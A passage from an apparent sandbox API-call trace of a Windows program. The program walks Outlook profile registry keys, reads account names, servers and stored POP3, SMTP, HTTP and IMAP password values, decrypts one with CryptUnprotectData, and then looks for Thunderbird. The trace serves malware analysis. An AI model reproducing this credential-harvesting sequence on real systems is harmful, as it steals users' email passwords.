lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0204.601] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", lpString2="\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0204.601] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", lpString2="00000002" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002" [0204.601] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.601] RegQueryValueExW (in: hKey=0x2a4, lpValueName="Account Name", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x4f, lpcbData=0x415ca64*=0x2a) returned 0x0 [0204.601] lstrlenW (lpString="Outlook Address Book") returned 20 [0204.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.602] lstrlenW (lpString="Outlook Address Book") returned 20 [0204.602] lstrcpyW (in: lpString1=0x2d80000, lpString2="Outlook Address Book" | out: lpString1="Outlook Address Book") returned="Outlook Address Book" [0204.602] lstrlenW (lpString="Outlook Address Book") returned 20 [0204.602] VirtualAlloc (lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0204.602] lstrcatW (in: lpString1="", lpString2="Outlook Address Book" | out: lpString1="Outlook Address Book") returned="Outlook Address Book" [0204.602] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.602] RegQueryValueExW (in: hKey=0x2a4, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.602] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.603] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.603] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.603] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.603] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.603] RegQueryValueExW (in: hKey=0x2a4, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.603] RegQueryValueExW (in: hKey=0x2a4, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.603] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.603] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.603] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.603] RegCloseKey (hKey=0x2a4) returned 0x0 [0204.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.603] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x2, lpName=0x415ca88, lpcchName=0x415fa90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000003", lpcchName=0x415fa90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0204.603] RegCloseKey (hKey=0x2a4) returned 0x0 [0204.604] lstrcpyW (in: lpString1=0x415da88, lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0204.604] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", lpString2="\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0204.604] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", lpString2="00000003" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003" [0204.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.604] RegQueryValueExW (in: hKey=0x2a4, lpValueName="Account Name", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x76, lpcbData=0x415ca64*=0x26) returned 0x0 [0204.604] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.604] VirtualAlloc (lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.604] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.604] lstrcpyW (in: lpString1=0x2d80000, lpString2="voeimd@djhreuu.uhd" | out: lpString1="voeimd@djhreuu.uhd") returned="voeimd@djhreuu.uhd" [0204.604] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.604] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0204.605] lstrcatW (in: lpString1="", lpString2="voeimd@djhreuu.uhd" | out: lpString1="voeimd@djhreuu.uhd") returned="voeimd@djhreuu.uhd" [0204.605] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.605] RegQueryValueExW (in: hKey=0x2a4, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x76, lpcbData=0x415ca64*=0x26) returned 0x0 [0204.605] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.605] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.605] VirtualAlloc (lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.606] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.606] lstrcpyW (in: lpString1=0x2d80000, lpString2="voeimd@djhreuu.uhd" | out: lpString1="voeimd@djhreuu.uhd") returned="voeimd@djhreuu.uhd" [0204.606] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.606] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0204.606] lstrcatW (in: lpString1="", lpString2="voeimd@djhreuu.uhd" | out: lpString1="voeimd@djhreuu.uhd") returned="voeimd@djhreuu.uhd" [0204.606] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.606] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x64, lpcbData=0x415ca64*=0xa) returned 0x0 [0204.606] lstrlenW (lpString="dfae") returned 4 [0204.606] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.607] lstrlenW (lpString="dfae") returned 4 [0204.607] lstrcpyW (in: lpString1=0x2d80000, lpString2="dfae" | out: lpString1="dfae") returned="dfae" [0204.607] lstrlenW (lpString="dfae") returned 4 [0204.607] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0204.607] lstrcatW (in: lpString1="", lpString2="dfae" | out: lpString1="dfae") returned="dfae" [0204.607] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.607] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x76, lpcbData=0x415ca64*=0xe) returned 0x0 [0204.607] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.608] lstrlenW (lpString="voeimd") returned 6 [0204.608] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.608] lstrlenW (lpString="voeimd") returned 6 [0204.608] lstrcpyW (in: lpString1=0x2d80000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0204.608] lstrlenW (lpString="voeimd") returned 6 [0204.608] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0204.608] lstrcatW (in: lpString1="", lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0204.608] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.609] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x67, lpcbData=0x415ca64*=0xc) returned 0x0 [0204.609] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.609] lstrlenW (lpString="grgew") returned 5 [0204.609] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.609] lstrlenW (lpString="grgew") returned 5 [0204.609] lstrcpyW (in: lpString1=0x2d80000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0204.609] lstrlenW (lpString="grgew") returned 5 [0204.609] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0204.611] lstrcatW (in: lpString1="", lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0204.611] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.612] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x2, lpcbData=0x415ca64*=0x131) returned 0x0 [0204.692] CryptUnprotectData (in: pDataIn=0x4158704, ppszDataDescr=0x0, pOptionalEntropy=0x0, pvReserved=0x0, pPromptStruct=0x0, dwFlags=0x0, pDataOut=0x41586fc | out: ppszDataDescr=0x0, pDataOut=0x41586fc) returned 1 [0204.738] lstrcpyW (in: lpString1=0x4158738, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0204.738] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0204.738] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.739] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0204.739] lstrcpyW (in: lpString1=0x2d80000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0204.739] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0204.739] VirtualAlloc (lpAddress=0x0, dwSize=0x36, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.739] lstrcatW (in: lpString1="", lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0204.739] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.740] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.740] RegQueryValueExW (in: hKey=0x2a4, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.740] RegQueryValueExW (in: hKey=0x2a4, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.740] lstrlenW (lpString="grgew") returned 5 [0204.740] lstrlenW (lpString="grgew") returned 5 [0204.740] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.740] lstrcpyW (in: lpString1=0x2d80000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0204.740] lstrlenW (lpString="voeimd") returned 6 [0204.740] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.741] lstrcpyW (in: lpString1=0x2e20000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0204.741] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0204.741] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0204.741] lstrcpyW (in: lpString1=0x2eb0000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0204.741] GetProcessHeap () returned 0x900000 [0204.741] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x54) returned 0x92c7a0 [0204.741] lstrlenW (lpString="grgew") returned 5 [0204.741] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2ec0000 [0204.742] lstrcpyW (in: lpString1=0x2ec0000, lpString2="grgew" | out: lpString1="grgew") returned="grgew" [0204.742] lstrlenW (lpString="voeimd") returned 6 [0204.742] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2ed0000 [0204.742] lstrcpyW (in: lpString1=0x2ed0000, lpString2="voeimd" | out: lpString1="voeimd") returned="voeimd" [0204.742] lstrlenW (lpString="sdkjhfsdjkf6sdfg68q34gadg") returned 25 [0204.742] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x2ee0000 [0204.742] lstrcpyW (in: lpString1=0x2ee0000, lpString2="sdkjhfsdjkf6sdfg68q34gadg" | out: lpString1="sdkjhfsdjkf6sdfg68q34gadg") returned="sdkjhfsdjkf6sdfg68q34gadg" [0204.742] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.743] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.743] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.743] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.744] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.744] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.744] RegCloseKey (hKey=0x2a4) returned 0x0 [0204.744] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.745] RegEnumKeyExW (in: hKey=0x2a4, dwIndex=0x3, lpName=0x415ca88, lpcchName=0x415fa90, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000004", lpcchName=0x415fa90, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0204.745] RegCloseKey (hKey=0x2a4) returned 0x0 [0204.745] lstrcpyW (in: lpString1=0x415da88, lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676" [0204.745] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", lpString2="\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0204.745] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", lpString2="00000004" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004" [0204.745] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.745] RegQueryValueExW (in: hKey=0x2a4, lpValueName="Account Name", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x76, lpcbData=0x415ca64*=0x26) returned 0x0 [0204.745] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.745] VirtualAlloc (lpAddress=0x0, dwSize=0x26, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.746] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.746] lstrcpyW (in: lpString1=0x2d80000, lpString2="voeimd@djhreuu.uhd" | out: lpString1="voeimd@djhreuu.uhd") returned="voeimd@djhreuu.uhd" [0204.746] lstrlenW (lpString="voeimd@djhreuu.uhd") returned 18 [0204.746] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0204.746] lstrcatW (in: lpString1="", lpString2="voeimd@djhreuu.uhd" | out: lpString1="voeimd@djhreuu.uhd") returned="voeimd@djhreuu.uhd" [0204.746] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.747] RegQueryValueExW (in: hKey=0x2a4, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.747] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.747] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.747] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.747] RegQueryValueExW (in: hKey=0x2a4, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.747] RegQueryValueExW (in: hKey=0x2a4, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.747] RegQueryValueExW (in: hKey=0x2a4, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.747] RegQueryValueExW (in: hKey=0x2a4, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x415a738, lpcbData=0x415ca64*=0x1000 | out: lpType=0x0, lpData=0x415a738*=0x0, lpcbData=0x415ca64*=0x1000) returned 0x2 [0204.747] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.747] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.747] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0204.748] RegCloseKey (hKey=0x2a4) returned 0x0 [0204.748] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0xf003f, phkResult=0x415fa94 | out: phkResult=0x415fa94*=0x2a4) returned 0x0 [0204.748] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0204.748] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0204.748] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0204.748] lstrlenW (lpString="Profile") returned 7 [0204.748] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0204.748] lstrlenW (lpString="Profile") returned 7 [0204.748] lstrcpyW (in: lpString1=0x2dd0000, lpString2="Profile" | out: lpString1="Profile") returned="Profile" [0204.748] lstrcpyW (in: lpString1=0x415f3a0, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" [0204.749] lstrcatW (in: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\", lpString2="thunderbird.exe" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\thunderbird.exe") returned="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\thunderbird.exe" [0204.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\thunderbird.exe", ulOptions=0x0, samDesired=0x1, phkResult=0x415f5b0 | out: phkResult=0x415f5b0*=0x0) returned 0x2 [0204.749] lstrlenW (lpString="") returned 0 [0204.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0204.749] lstrlenW (lpString="") returned 0 [0204.749] lstrcpyW (in: lpString1=0x2de0000, lpString2="" | out: lpString1="") returned="" [0204.749] GetBinaryTypeW (in: lpApplicationName="", lpBinaryType=0x415f9fc | out: lpBinaryType=0x415f9fc) returned 0 [0204.749] lstrlenW (lpString="") returned 0 [0204.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.749] lstrcpyW (in: lpString1=0x2df0000, lpString2="" | out: lpString1="") returned="" [0204.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x415f388 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0204.749] SetCurrentDirectoryW (lpPathName="") returned 0 [0204.750] lstrlenW (lpString="\\") returned 1 [0204.750] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.750] lstrlenW (lpString="\\") returned 1 [0204.750] lstrcpyW (in: lpString1=0x2e20000, lpString2="\\" | out: lpString1="\\") returned="\\" [0204.750] lstrlenW (lpString="\\") returned 1 [0204.750] lstrlenW (lpString="") returned 0 [0204.750] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f318, dwLength=0x1c | out: lpBuffer=0x415f318*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.750] VirtualAlloc (lpAddress=0x0, dwSize=0x6, 